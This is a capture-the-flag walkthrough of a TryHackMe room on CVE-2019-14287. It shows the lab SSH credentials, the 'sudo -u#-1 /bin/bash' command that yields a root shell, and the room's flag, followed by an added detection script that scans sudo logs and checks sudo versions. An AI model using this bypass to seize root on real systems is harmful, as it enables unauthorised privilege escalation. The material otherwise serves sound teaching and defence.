In this walkthrough, we will go through the Sudo Security Bypass room from TryHackMe. In this room, we will explore CVE-2019-14287, a vulnerability in the Unix sudo program, and exploit it to get root. On that note, let's get started.
Machine Info:
Title | SudoVulns |
IP address | 10.10.177.149 |
Difficulty | Easy |
Objective | A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series |
Task 1 – Deploy!
ssh -p 2222 tryhackme@10.10.177.149
Task 2 – Security Bypass
SSH into that machine you deployed earlier, using port 2222.
The credentials are:
Username: tryhackme
Password: tryhackme
If you’re using Linux, the command will look like this:
ssh -p 2222 tryhackme@10.10.177.149
Question 1 – What command are you allowed to run with sudo?
sudo -l
/bin/bash
Question 2 – What is the flag in /root/root.txt?
tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~#
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
root@sudo-privesc:~# whoami
root
root@sudo-privesc:~# cat /root/root.txt
THM{l33t_s3cur1ty_bypass}
root@sudo-privesc:~#
THM{l33t_s3cur1ty_bypass}
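From the defender's side, the `sudo -u#-1` call above works because sudo releases before 1.8.28 resolve the numeric user ID -1 (or 4294967295) to UID 0, and that odd target user is what to hunt for in sudo's logs. The script below is an added example, not part of the room or the original walkthrough: it flags such log entries and checks a sudo version string against the fixed release. The function names, the sample log lines and the exact log layout are assumptions.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): defender-side checks
# for CVE-2019-14287. Function names and sample lines are assumptions.

# Constructed sudo log entries in the usual "USER=... ; COMMAND=..." layout.
SAMPLE_LOG='Oct 15 10:01:02 sudo-privesc sudo: tryhackme : TTY=pts/0 ; PWD=/home/tryhackme ; USER=root ; COMMAND=/usr/bin/id
Oct 15 10:02:10 sudo-privesc sudo: tryhackme : TTY=pts/0 ; PWD=/home/tryhackme ; USER=#-1 ; COMMAND=/bin/bash
Oct 15 10:03:44 sudo-privesc sudo: tryhackme : TTY=pts/0 ; PWD=/home/tryhackme ; USER=#1001 ; COMMAND=/bin/ls
Oct 15 10:04:05 sudo-privesc sudo: tryhackme : TTY=pts/0 ; PWD=/home/tryhackme ; USER=#4294967295 ; COMMAND=/bin/bash'

# Read sudo log lines on stdin and print "<invoker> <runas> <command>" for
# entries whose target user is the numeric ID -1 or 4294967295.
find_runas_bypass() {
    sed -n -E 's/^.* sudo: +([^ ]+) : .*USER=(#?(-1|4294967295)) ; COMMAND=(.*)$/\1 \2 \4/p'
}

# Exit 0 when a sudo version string is older than 1.8.28 (the fixed release).
# Distributions backport fixes, so treat a hit as "check the package changelog".
sudo_version_is_vulnerable() {
    v=${1%%[!0-9.]*}                 # drop a patch suffix such as "p2"
    old_ifs=$IFS; IFS=.; set -- $v; IFS=$old_ifs
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    [ "$major" -lt 1 ] && return 0
    [ "$major" -gt 1 ] && return 1
    [ "$minor" -lt 8 ] && return 0
    [ "$minor" -gt 8 ] && return 1
    [ "$patch" -lt 28 ]
}

# Demo on the constructed sample and one version string.
printf '%s\n' "$SAMPLE_LOG" | find_runas_bypass
if sudo_version_is_vulnerable "1.8.21p2"; then
    echo "sudo 1.8.21p2 predates the 1.8.28 fix"
fi
```

On a real host, feed `find_runas_bypass` the sudo entries from the system's auth log and pass the version reported by `sudo -V` to `sudo_version_is_vulnerable`.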
So that was “Sudo Security Bypass” for you. In this room, we learned about and explored CVE-2019-14287, a vulnerability in the Unix sudo program, and exploited it to get root. We logged into the server using SSH, then used the sudo bypass command and got our root flag. On that note, I will take my leave, but stay tuned for the next one and till then, remember to “Hack the planet”.